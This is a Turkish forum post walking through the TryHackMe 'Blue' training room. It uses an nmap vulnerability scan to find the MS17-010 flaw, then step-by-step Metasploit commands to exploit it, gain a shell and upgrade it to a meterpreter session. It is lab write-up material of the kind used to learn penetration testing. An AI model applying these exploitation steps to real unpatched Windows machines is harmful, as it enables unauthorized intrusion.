TryHackMe Blue Makine Çözümü

Bugs Bunny

Uzman üye
29 Tem 2016
1,487
35
MSFVenom
Herkese merhaba TurkHackTeam üyeleri,

Ben Uchiha-Sasuke

Bu konumda sizlere TryHackMe Blue adlı makinenin çözümü göstereceğim.


giphy.gif



Room'u Deploy edelim.

gPh51j.png


Ardından NMAP taraması yapalım.

Ygu8MW.png


Komutumuz;

Kod:
nmap -sV -vv --script vuln IP

Ardından komutu çalıştıralım.

BwymXM.png


Bj9euc.png


Gördüğünüz gibi bize açık portları verdi, ncak bizim işimize yarayacak olan şey bu değil.

Altta ms17-010 açığının olduğunu görüyoruz.

Bu açık meşhur Windows zafiyetlerinden biridir.

Şimdi ****sploiti çalıştıralım.

iacm4A.png


Komutumuz;

Kod:
msfconsole

Bulduğumuz açığı aratalım.

GVtSBy.png


Komutumuz;

Kod:
search ms17-010

2. Seçeneği kullanacağız.

AHXopW.png


Komutumuz;

Kod:
use 3

Şimdi ise doldurmamız gereken yeri dolduracağız.

GdhASf.png


Komutumuz;

Kod:
show options

Gördüğünüz gibi birkaç doldurulabilen yer var ama biz sadece RHOSTS parametresini dolduracağız.

FKFUca.png


Komutumuz;

Kod:
set RHOSTS IP
run
Run yani çalıştırma komutumuzu yazdıktan sonra bir hata vermezse başardık demektir.

vLOLYo.png


WArjw5.png


Görüldüğü üzere hedef sisteme erişimimizi başarılı bir şekilde sağladık.

Şimdi ise oturumu arka plana alalım.

MlVLqS.png


Komutumuz;

Kod:
background
y
Şimdi yapacağım iş ise birnevi yetki yükselteceğiz.

ehCLKU.png


Komutumuz;

Kod:
use post/multi/manage/shell_to_meterpreter

Şimdi tekrardan show options komutunu çalıştırıp gerekli yerleri dolduracağız.

Oi4vOP.png


Gördüğünüz gibi pek doldurulacak şey yok.

Yanlızca session'u ayarlayacağız.

qoeUAB.png


Komutumuz;

Kod:
set sessions 1
run

iEQZ92.png


Gördüğünüz gibi komutumuz başarılı bir şekilde çalıştı, kontrol etmek için;

hwd2Pz.png


Komutumuz;

Kod:
sessions

Resimde görüldüğü gibi id 1 session yetkisiz, id 2 session yetkiye sahip.

Session 2'de oturum açmak için;

kpO0Iv.png


Komutumuz;

Kod:
sessions -i 2

Ve başarılı bir şekilde giriş yaptık.


Bu konumunda burda sonuna gelmiş bulunmaktayım.

Uchiha iyi günler diler.

oKEKz1.gif


 
Moderatör tarafında düzenlendi:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.